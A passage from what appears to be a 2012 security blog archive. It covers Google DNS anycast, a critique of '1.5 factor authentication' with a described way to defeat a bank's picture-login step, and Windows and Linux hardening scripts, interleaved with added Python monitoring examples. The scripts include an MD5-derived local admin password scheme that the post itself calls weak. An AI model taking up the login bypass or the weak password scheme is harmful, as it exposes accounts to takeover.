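                rtts.append((time.perf_counter() - started) * 1000)
        except (OSError, ValueError, IndexError, struct.error):
            pass
        finally:
            sock.close()
    return summarise(rtts, count)


# Constructed reply (not captured from any server): NOERROR for example.com with one
# A record whose owner name is a compression pointer back to offset 12.
SAMPLE_TXID = 0x1234
SAMPLE_REPLY = (b"\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00"
                b"\x07example\x03com\x00\x00\x01\x00\x01"
                b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04\x5d\xb8\xd8\x22")


def demo_offline() -> dict:
    """Parse the constructed reply so the parser can be exercised without a network."""
    return parse_response(SAMPLE_REPLY, SAMPLE_TXID)


if __name__ == "__main__":
    print("offline parse:", demo_offline())
    # 8.8.8.8 is Google's public resolver from the post; add your ISP's resolver to compare.
    for resolver in ["8.8.8.8"]:
        print(resolver, probe(resolver))
```

Run it from the site whose forwarders you are choosing, since an anycast resolver's latency depends on where you are, and compare the loss and median figures rather than a single lookup. Unlike WinMTR, the probe measures the DNS service itself rather than ICMP to each hop, so loss at an intermediate router that does not show up here is usually ICMP rate limiting rather than a real problem.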
It wasn't this way when it first started. I remember using Google DNS early on and seeing latency of 100+ ms and about 10-15 hops; I quickly realised that of course they are Google, and they are now using <a href="http://en.wikipedia.org/wiki/Anycast">Anycast</a>. A quick traceroute from elsewhere in the world (thanks to <a href="http://centralops.net/co/">centralops tools</a>) confirmed this by taking a different route (more hops but lower response time, and the first 5 are internal to that hosting network):<br />
<table border="0" cellpadding="3" cellspacing="1"><tbody>
<tr><td align="right" width="20">Hop</td> <td align="right" width="40">RTT 1 (ms)</td> <td align="right" width="40">RTT 2 (ms)</td> <td align="right" width="40">RTT 3 (ms)</td> <td width="200">IP address</td> <td>Hostname</td></tr>
<tr><td align="right">1</td> <td align="right">1</td> <td align="right">1</td> <td align="right">1</td> <td>70.84.211.97</td> <td>61.d3.5446.static.theplanet.com</td></tr>
<tr><td align="right">2</td> <td align="right">0</td> <td align="right">0</td> <td align="right">0</td> <td>70.87.254.1</td> <td>po101.dsr01.dllstx5.networklayer.com</td></tr>
<tr><td align="right">3</td> <td align="right">0</td> <td align="right">0</td> <td align="right">0</td> <td>70.85.127.105</td> <td>po51.dsr01.dllstx3.networklayer.com</td></tr>
<tr><td align="right">4</td> <td align="right">2</td> <td align="right">0</td> <td align="right">0</td> <td>173.192.18.228</td> <td>ae16.bbr02.eq01.dal03.networklayer.com</td></tr>
<tr><td align="right">5</td> <td align="right">0</td> <td align="right">0</td> <td align="right">0</td> <td>173.192.18.208</td> <td>ae7.bbr01.eq01.dal03.networklayer.com</td></tr>
<tr><td align="right">6</td> <td align="right">0</td> <td align="right">0</td> <td align="right">0</td> <td>50.97.16.37</td> <td></td></tr>
<tr><td align="right">7</td> <td align="right">1</td> <td align="right">0</td> <td align="right">0</td> <td>72.14.233.77</td> <td></td></tr>
<tr><td align="right">8</td> <td align="right">1</td> <td align="right">1</td> <td align="right">0</td> <td>72.14.237.219</td> <td></td></tr>
<tr><td align="right">9</td> <td align="right">7</td> <td align="right">7</td> <td align="right">7</td> <td>216.239.47.121</td> <td></td></tr>
<tr><td align="right">10</td> <td align="right">7</td> <td align="right">7</td> <td align="right">7</td> <td>216.239.46.59</td> <td></td></tr>
<tr><td align="right">11</td> <td align="right">*</td> <td align="right">*</td> <td align="right">*</td> <td></td> <td></td></tr>
<tr><td align="right">12</td> <td align="right">7</td> <td align="right">7</td> <td align="right">7</td> <td>8.8.8.8</td> <td>google-public-dns-a.google.com</td></tr>
</tbody></table><br /><br />So, moral of the story: if, like me, you are using one of the aforementioned or another external DNS in place of or in addition to your ISP's, now is a good time to move to Google's DNS, as it is probably faster than everyone else bar your ISP, and gives you a bit of redundancy. As one of my colleagues used to joke, if Google is down, the internet is down.<br />I did read something interesting in my travels researching this: geographic-aware DNS (aka GeoDNS). There is a patch for BIND and a fork of DJBDNS here: http://geoipdns.org/. Interesting; it is a similar idea to one I discussed with a colleague a few years ago and tested implementing in a kludge style with Microsoft's DNS server. This implementation is a lot smoother, however.<br /><br />Oh, and there is an update to my previous post on 1.5 factor auth. Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-62970091014030431602012-11-13T21:32:00.000+11:002015-11-25T15:53:35.207+11:00"1.5 factor authentication"?A colleague recently tried to convince me that "1.5 factor authentication" was better than 1 factor, so I decided to look into it.<br /><br />First some basics. Generally speaking, authentication at its most basic level on computer systems works via a username and password. This is 1-factor authentication. 
It combines something that is unprotected and possibly public, your username, with something that should be kept hidden and secret, your password or passphrase.<br />The 2nd factor in 2-factor authentication is the addition of something you have: some kind of cryptographic token (USB key, RFID token, smart card, numeric or alphanumeric code token, à la RSA SecurID and WiKID soft tokens).<br />The 3rd factor of authentication is something new, but it requires the first two in addition to something you are, e.g. thumbprint, voice print, etc. Basically the 3rd factor is the addition of biometrics. I am really not a fan of biometrics as the only method of authentication, as you can reissue a security token but you can't reissue your thumb. I can see that having it in addition, though, would be workable.<br /><br />See here for a more in-depth PCI view of these three widely accepted authentication factors: <a href="http://pciguru.wordpress.com/2010/05/01/one-two-and-three-factor-authentication/">http://pciguru.wordpress.com/2010/05/01/one-two-and-three-factor-authentication/</a><br /><br />There is also a not yet well supported but interesting idea for a 4th factor: in addition to all the other factors, the computer or website or what-have-you authenticates that you are where you say you are. This 4th factor is hard to implement at the moment, and they are obviously trying to make it transparent to the end user, so say you have an app on your phone that fires up GPS and sends it through to ensure you are logging in from areas you have pre-defined. I actually heard of someone using log correlation years ago to this effect: basically they watched logins from the internal network and the VPN concentrators, and if a user attempted to VPN in from a geographically remote IP when they had only recently been seen somewhere geographically local, or even on the network, then they would shut down the geographically remote session. 
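That log-correlation check, written out as an added Python example (my code, not from this post or from the article it recalls): it groups geolocated login events by user, computes the great-circle distance between each consecutive pair of logins and the speed the user would have needed to cover it, and raises an alert when that speed is implausible. It assumes each event has already been geolocated to a latitude and longitude by an upstream enrichment step (the post's VPN concentrator and internal-network logs would be the source), and the 900 km/h threshold is an assumption to tune; the log lines are constructed, not from any real environment.

```python
"""Impossible-travel detection over geolocated login events (constructed sample data)."""
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt

# Constructed sample log lines, not from any real system. Each login has already been
# geolocated (lat/lon) by whatever enrichment sits in front of this check.
SAMPLE_LOG = """\
2012-11-13T09:00:00Z user=alice via=lan site=HQ-NewYork lat=40.7128 lon=-74.0060
2012-11-13T12:00:00Z user=alice via=vpn site=Boston lat=42.3601 lon=-71.0589
2012-11-13T12:01:00Z user=alice via=vpn site=Boston lat=42.3601 lon=-71.0589
2012-11-13T10:00:00Z user=exec via=lan site=HQ-NewYork lat=40.7128 lon=-74.0060
2012-11-13T10:05:00Z user=exec via=vpn site=SaoPaulo lat=-23.5505 lon=-46.6333
"""

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 900.0  # assumption: roughly airliner speed; tune for your user base


def parse_line(line: str) -> dict:
    """Parse one 'timestamp key=value ...' line into an event dict."""
    ts, *fields = line.split()
    event = {"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    event["lat"] = float(event["lat"])
    event["lon"] = float(event["lon"])
    return event


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in kilometres between two latitude/longitude points."""
    p1, p2 = radians(lat1), radians(lat2)
    dlat, dlon = p2 - p1, radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(p1) * cos(p2) * sin(dlon / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def find_impossible_travel(log_text: str, max_kmh: float = MAX_PLAUSIBLE_KMH) -> list:
    """One alert per consecutive login pair (per user) whose implied speed exceeds max_kmh."""
    by_user = {}
    for line in log_text.splitlines():
        if line.strip():
            event = parse_line(line)
            by_user.setdefault(event["user"], []).append(event)
    alerts = []
    for user, events in by_user.items():
        events.sort(key=lambda e: e["time"])  # logs from several sources arrive out of order
        for prev, cur in zip(events, events[1:]):
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            if km < 1.0:  # same place (or geolocation jitter): nothing to judge
                continue
            hours = (cur["time"] - prev["time"]).total_seconds() / 3600
            # Identical timestamps with a real distance are impossible, not a division error.
            speed = km / hours if hours > 0 else float("inf")
            if speed > max_kmh:
                alerts.append({"user": user, "from": prev["site"], "to": cur["site"],
                               "via": cur["via"], "km": round(km), "kmh": round(speed)})
    return alerts


if __name__ == "__main__":
    for alert in find_impossible_travel(SAMPLE_LOG):
        print(alert)
```

On the sample data only the exec's VPN login from São Paulo five minutes after an office login in New York is flagged; alice's New York to Boston move over three hours is well under the threshold, and her repeated Boston login is skipped as zero distance. In production the alert would feed the session-termination step the post describes, and the threshold plus a small grace distance keep geolocation jitter from generating noise.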
I can't find the article now, but this supposedly shut down a hacker trying to get into this USA-based company using an exec's credentials via the VPN from South America when the exec had been seen on the local network only minutes earlier.<br />See here for more on the 4th factor: <a href="http://blog.dustintrammell.com/2008/11/21/four-factor-authentication/">http://blog.dustintrammell.com/2008/11/21/four-factor-authentication/</a><br /><br />Now to get to 1.5 factor auth. I couldn't find much:<br />Market-speak: <a href="http://blog.mailchimp.com/introducing-alterego-1-5-factor-authentication-for-web-apps/">http://blog.mailchimp.com/introducing-alterego-1-5-factor-authentication-for-web-apps/</a><br />Comment decrying it for being touted as 2 factor auth: <a href="http://stackoverflow.com/questions/559639/what-is-two-factor-authentication">http://stackoverflow.com/questions/559639/what-is-two-factor-authentication</a><br />Market-speak, but an interesting implementation: <a href="http://pingrid.org/">http://pingrid.org/</a><br />Very aptly named blog: <a href="http://www.ryanhicks.net/blog/2008/10/15-factor-authentication.html">http://www.ryanhicks.net/blog/2008/10/15-factor-authentication.html</a><br />But on to this colleague's definition: 1.5 factor auth is a password and a PIN... So still two things that you know. 
Yes, it may be prettied up in the case of pingrid, or horrible and easy to break as in the case of the screenshot below from a banking institution here in Australia that I used to use, but it is still two somethings that you know; by definition still one factor, per the definitions of factors above.<br /><br /><a href="http://2.bp.blogspot.com/-Q4zhtQBO9vg/UKHBuOINzQI/AAAAAAAAAaY/_2WWTU6x9vI/s1600/1.factor.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Q4zhtQBO9vg/UKHBuOINzQI/AAAAAAAAAaY/_2WWTU6x9vI/s1600/1.factor.jpg" /></a>On to the example I mentioned earlier. I used to use a financial institution that I believe started using the below "extra factor" in 2003 (this is a mock-up; I no longer have an account there). I laughed when I first saw it, realising it added no real security. The idea is that you pick three images and you have to click them in order; the images get shuffled each login.<br />As I watched over more logins I noticed that the pictures changed every time, except the pictures I as a user had to click. So if someone had my username and password they could simply log in several times, see the picture auth, note down the pictures, then exit; do this a large enough number of times and, like a game of "Guess Who", you have narrowed down the pictures needed to authenticate in this step. As there are only three and you need to click them in order, you have to make only 6 failed attempts and you will have it.<br /><br />The problem with this 1.5 factor is that, depending on the implementation, it could be almost 50% more security than 1 factor, but in the case of the above image it is probably 1.0000000000000001 factor. The other issue is that even if it is 50% better than 1 factor, it is not 50% worse than 2 factor: 2 factor is insanely better than 1 factor, coming back to implementation of course, but even the worst is orders of magnitude better. 
Have a look at how complex pingrid is. I doubt that most end users would pick this up quickly, and I would say 90% will write down what they have to do, and what they do do, to get authenticated. This makes it no longer something that is kept secret, and it may make authentication for legitimate users so hard that they fail more often, causing increased support calls and decreased productivity.<br /><br />This half-factor addition is bad market-speak at best, and a false sense of security with a move toward introducing vulnerabilities in the authentication chain at worst.<br /><br />UPDATE: Being the security geek I am, I decided to email the venerable <a href="http://www.schneier.com/">Bruce Schneier</a>, and his word from on high matches my own: "It doesn't (add security). It's a marketing ploy." Squeee, I got a reply from Bruce Schneier... but yeah, 1.5 factor is bs; coffin closed and put to bed.Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-19636233273591329702012-09-11T20:29:00.000+10:002012-09-12T10:25:35.987+10:00Securing your environment<!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="10" 
SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" 
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" 
SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException 
Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> </w:LatentStyles></xml><![endif]--> <br /><div class="MsoNormal">A recent Risky Business podcast (episode 252, <a href="http://risky.biz/RB252">http://risky.biz/RB252</a>) prompted me to write this. </div><div class="MsoNormal">The host Patrick Gray, Adam Boileau and later HD Moore were talking about the recent mass compromise of some 30,000 workstations at Saudi Aramco, ouch. Some of the mitigations that were mentioned I have done before, so I thought I would get them out there;</div><div class="MsoNormal"><br /></div><div class="MsoNormal">First up, <b>administrative group monitoring in a Windows domain</b>: trivially easy, fifteen minutes at most to set up.</div><div class="MsoNormal"><br /></div><div class="MsoNormal">On one of your DCs create a group-audit.vbs file as below. It takes a group's distinguished name as its only argument, prints each user member as "display name ; mail", and recurses into nested groups, which is exactly where a quietly added account tends to hide;</div><div class="MsoNormal"><br /></div><div class="MsoNormal"><i>' group-audit.vbs: list the members of a group, recursing into nested groups<br />' usage: cscript //nologo group-audit.vbs "CN=Administrators,CN=Builtin,DC=DOMAIN,DC=TLD"<br />sLDAPPath = WScript.Arguments.Item(0)<br />strTargetGroupDN = "LDAP://" &amp; sLDAPPath<br />EnumNestedGroup strTargetGroupDN<br /><br />Function EnumNestedGroup(strGroupDN)<br />&nbsp;&nbsp;&nbsp;&nbsp;Set objGroup = GetObject(strGroupDN)<br />&nbsp;&nbsp;&nbsp;&nbsp;For Each objMember In objGroup.Members<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If LCase(objMember.Class) = "group" Then<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;' nested group: print its path, then walk its members as well<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WScript.Echo objMember.AdsPath<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EnumNestedGroup objMember.AdsPath<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;' user (or computer) member: one line, display name and mail<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WScript.Echo objMember.DisplayName &amp; " ; " &amp; objMember.Mail<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;End If<br />&nbsp;&nbsp;&nbsp;&nbsp;Next<br />&nbsp;&nbsp;&nbsp;&nbsp;Set objGroup = Nothing<br />End Function</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal">Then in a batch file run the below once per group you want to monitor, each into its own log file. Use the group's full DN: the built-in Administrators group lives under CN=Builtin, whereas Domain Admins, Enterprise Admins and Schema Admins live under CN=Users (and any other privileged group wherever you created it). Compare each log with the previous run at the end of the script (fc on a bare Windows box, diff if you have GnuWin32 or Cygwin) and email the output if there are any differences (blat is your friend).</div><div class="MsoNormal"><i>cscript //nologo C:\scripts\group-audit.vbs "CN=Administrators,CN=Builtin,DC=DOMAIN,DC=TLD" &gt; C:\scripts\administrators.log<br />cscript //nologo C:\scripts\group-audit.vbs "CN=Domain Admins,CN=Users,DC=DOMAIN,DC=TLD" &gt; C:\scripts\domain-admins.log</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>Sudoers/root group monitoring for Linux</b>;</div><div class="MsoNormal">Similar to the Windows script: dump the groups you need to monitor, diff the result against the previous run and pipe any difference out to email. Which groups matter depends on the distro (sudo on Debian/Ubuntu, wheel on RHEL/Fedora) plus anything /etc/sudoers or /etc/sudoers.d grants directly. If you don't have getent, <i>grep ^GROUPNAME /etc/group</i> does the same job. 
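Both audits above end the same way: keep the last dump, diff it against today's, mail on any difference. The script below is an added example and not one of the post's own scripts; it does that compare-and-alert step for both formats (the getent output of the Linux audit and the "display name ; mail" lines of group-audit.vbs) on constructed sample snapshots. The group names, people and DNs in it are made up, and it returns the alert lines rather than mailing them, so blat or sendemail can be bolted on as the post describes.

```python
"""Group-membership drift monitor: snapshot, diff against last time, alert.

Added example, not one of the post's own scripts. It does the compare-and-alert
step the post describes for both audits, on constructed sample snapshots:
  * Linux:   lines as printed by `getent group NAME` (or grep ^NAME /etc/group)
  * Windows: lines as printed by group-audit.vbs ("<DisplayName> ; <mail>" for
             users, an LDAP:// path for a nested group)
Group names, people and DNs below are made up. Sending the mail (blat or
sendemail) is left to the caller: the functions return the alert lines.
"""
from __future__ import annotations

# ---- constructed sample snapshots (yesterday's log vs today's) ----------------
LINUX_OLD = "sudo:x:27:alice,bob\nroot:x:0:\n"
LINUX_NEW = "sudo:x:27:alice,bob,mallory\nroot:x:0:eve\n"
WINDOWS_OLD = """Alice Admin ; alice@example.com
LDAP://CN=Tier0 Ops,OU=Groups,DC=example,DC=com
Bob Builder ; bob@example.com
"""
WINDOWS_NEW = """Alice Admin ; alice@example.com
LDAP://CN=Tier0 Ops,OU=Groups,DC=example,DC=com
Mallory Mal ; mallory@example.com
"""


def parse_getent(text: str) -> dict[str, set[str]]:
    """getent / /etc/group lines (name:pw:gid:m1,m2) -> {group: {members}}."""
    groups: dict[str, set[str]] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, _pw, _gid, members = line.split(":", 3)
        groups[name] = {m for m in members.split(",") if m}
    return groups


def parse_group_audit(text: str) -> set[str]:
    """group-audit.vbs output -> set of member identifiers.

    Users are keyed on the mail column, lowercased, so a display-name edit does
    not trigger an alert; nested groups are keyed on their LDAP path.
    """
    members: set[str] = set()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.upper().startswith("LDAP://"):
            members.add(line)
        elif ";" in line:
            display, mail = (part.strip() for part in line.split(";", 1))
            members.add(mail.lower() or display)   # member with no mail attribute
        else:
            members.add(line)
    return members


def diff_members(old: set[str], new: set[str]) -> tuple[set[str], set[str]]:
    """(added, removed) relative to the previous snapshot."""
    return new - old, old - new


def linux_alerts(old_text: str, new_text: str) -> list[str]:
    """One alert line per Linux group whose membership changed; [] means no change."""
    old, new = parse_getent(old_text), parse_getent(new_text)
    alerts = []
    for group in sorted(set(old) | set(new)):
        added, removed = diff_members(old.get(group, set()), new.get(group, set()))
        if added or removed:
            alerts.append(f"{group}: +{sorted(added)} -{sorted(removed)}")
    return alerts


def windows_alerts(group_name: str, old_text: str, new_text: str) -> list[str]:
    """Same for one Windows group audited by group-audit.vbs."""
    added, removed = diff_members(parse_group_audit(old_text), parse_group_audit(new_text))
    return [f"{group_name}: +{sorted(added)} -{sorted(removed)}"] if added or removed else []


if __name__ == "__main__":
    # In production read today's and yesterday's log files from disk and only
    # mail when the combined list is non-empty.
    for line in linux_alerts(LINUX_OLD, LINUX_NEW) + windows_alerts("Administrators", WINDOWS_OLD, WINDOWS_NEW):
        print("ALERT", line)
```

Keying Windows users on the mail attribute rather than the display name is deliberate: a renamed account should not page anyone, a new one should. Run against the samples it reports eve joining root, mallory joining sudo, and mallory replacing bob in Administrators, and nothing at all when a snapshot is compared with itself.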
Call sendemail (the Linux equivalent of blat) at the end if there is a difference; diff exits non-zero when the files differ, so the whole alert is one || away;</div><div class="MsoNormal"><i>mv /root/logs/sudo.log /root/logs/old/<br />mv /root/logs/root.log /root/logs/old/<br />getent group sudo &gt; /root/logs/sudo.log&nbsp;&nbsp;&nbsp;&nbsp;# wheel on RHEL/Fedora<br />getent group root &gt; /root/logs/root.log<br />for g in sudo root; do<br />&nbsp;&nbsp;&nbsp;&nbsp;diff /root/logs/old/$g.log /root/logs/$g.log &gt; /root/logs/$g.diff || sendemail -f audit@$(hostname) -t ops@DOMAIN.TLD -u "$g group changed on $(hostname)" -m "$(cat /root/logs/$g.diff)"<br />done</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>Inactive accounts check, and if you're really harsh, disable them, in Windows</b>;</div><div class="MsoNormal">The 12 below is the number of weeks to look back. This is not foolproof (it relies on the lazily replicated lastLogonTimestamp attribute), so sometimes accounts will show up that have been active more recently. It is a good idea to have a Disabled Accounts OU to move them into;</div><div class="MsoNormal"><i>dsquery user -inactive 12 -limit 0 | find /v "OU=Disabled Accounts" | find /v "OU=ANY OU YOU WANT TO IGNORE" &gt; c:\scripts\inactive.txt<br />rem this is the disable part; use a single % instead of %% if you run it outside a batch file. Hope you don't have # in your usernames too :)<br />for /f "delims=#" %%a in ('type c:\scripts\inactive.txt') do (<br />&nbsp;&nbsp;&nbsp;&nbsp;dsmod user %%a -disabled yes<br />&nbsp;&nbsp;&nbsp;&nbsp;dsmove %%a -newparent "OU=Disabled Accounts,DC=DOMAIN,DC=TLD"<br />)</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>SSH monitoring for Linux</b>: Fail2Ban or DenyHosts, use one or the other, love it.</div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>Different local admins per computer</b>; this idea came from a colleague who worked at a big multinational that had it as a standard, very cool idea. 
This will stop viruses and worms that simply learn the local admin password and then propagate via admin$ shares with it wherever they can. It won't stop a committed attacker, who will probably work out the system (you can lengthen the password by increasing the 15 in the set finalpass line, or even mix in a second, different md5 of something). The scheme has an inherent weakness: whoever holds the passphrase can derive every machine's password, past and present, so guard the passphrase like a domain admin credential and change it when admins leave. (Microsoft's LAPS now does this job properly, with a random per-machine password stored in AD behind an ACL, and is the better choice where you can use it.) This should be put in a batch file run by a scheduled task at midnight; you can go further and run it hourly by extending thedate to include the hour. Note that the offsets in %date:~4,10% assume the weekday-prefixed US short date format; check echo %date% on your locale first;</div><div class="MsoNormal"><br /></div><div class="MsoNormal"><i>set thedate=%date:~4,10%<br />rem no spaces in the passphrase, otherwise you need quotes and they become part of the hashed string<br />set passphrase=PASSPHRASEHERE<br />rem md5.exe is any command line md5 tool that hashes the string given as -d&lt;string&gt;<br />for /f %%a in ('c:\stat\md5.exe -d%computername%%passphrase%%thedate:/=-%') do set pass=%%a<br />set finalpass=%pass:~0,15%</i></div><div class="MsoNormal"><i><br /></i></div><div class="MsoNormal"><i>net user LOCALADMIN %finalpass%</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal">Then to retrieve a computer's password simply run the batch file below. Obviously protect the passphrase and the retrieval batch file; if just anyone can read the rotation script on the local PC they can see what the password is, so lock it down with permissions;</div><div class="MsoNormal"><br /></div><div class="MsoNormal"><i>set passphrase=PASSPHRASEHERE<br />set thedate=%date:~4,10%<br />set /p computer="Enter computer hostname: "<br />for /f %%a in ('c:\stat\md5.exe -d%computer%%passphrase%%thedate:/=-%') do set pass=%%a<br />echo %pass:~0,15%</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>Workstation and server hardening.</b></div><div class="MsoNormal">This is a massive topic that people have written hundreds of volumes on, but really: keep all your stuff up to date and look at what lockdown features are in your OS. Obviously easier said than done, otherwise something like 80% of breaches wouldn't occur.</div><div class="MsoNormal">For network lockdown in Windows there is the Windows firewall, TCP/IP filtering (older releases such as Windows 2003) and IPsec policy, which can all easily lock down ports and applications.&nbsp;</div><div class="MsoNormal">On Linux there is iptables, which is easy enough to use; see <a href="http://richmorrison.net/?p=36">http://richmorrison.net/?p=36</a> for a quick guide.</div><div class="MsoNormal"><br /></div><div class="MsoNormal">Generally speaking you limit the number of local admins/superusers on any OS, so monitor this too. Monitor your important groups; heck, on a Windows workstation the below will do the trick;</div><div class="MsoNormal"><i>net localgroup administrators &gt; c:\scripts\local-admin.log</i> </div><div class="MsoNormal">then diff it against last time and alert on any difference. </div><div class="MsoNormal"><br /></div><div class="MsoNormal">AV is dead, and so is blacklisting. Sure, keep AV running to protect any systems that don't have your kick-ass whitelisting enabled. Use something simple: ClamAV is my favourite for simple, effective, cross-platform AV; on Windows you probably need more depending on what the machine is used for and your budget. I am generally pretty loath to put more and more agents on servers, as one will always eventually cause a crash, so they really have to add value on an immense scale for me to say ok.</div><div class="MsoNormal">For filesystem and application lockdown, in Windows there is Software Restriction Policy (SRP) and AppLocker, which from my playing around looks like a gussied-up version of SRP. If you have AppLocker, use it to whitelist a clean system, then block everything else and you are pretty safe for the time being. AppLocker's file hash rules use SHA-256 (SRP's hash rules date from the MD5/SHA-1 era), and either way an attacker would need a second preimage, an executable carrying their payload that hashes to the same value as a file already on the box, which even MD5 does not give them; the chance of some random attacking your server/PC pulling that off is vanishingly small. 
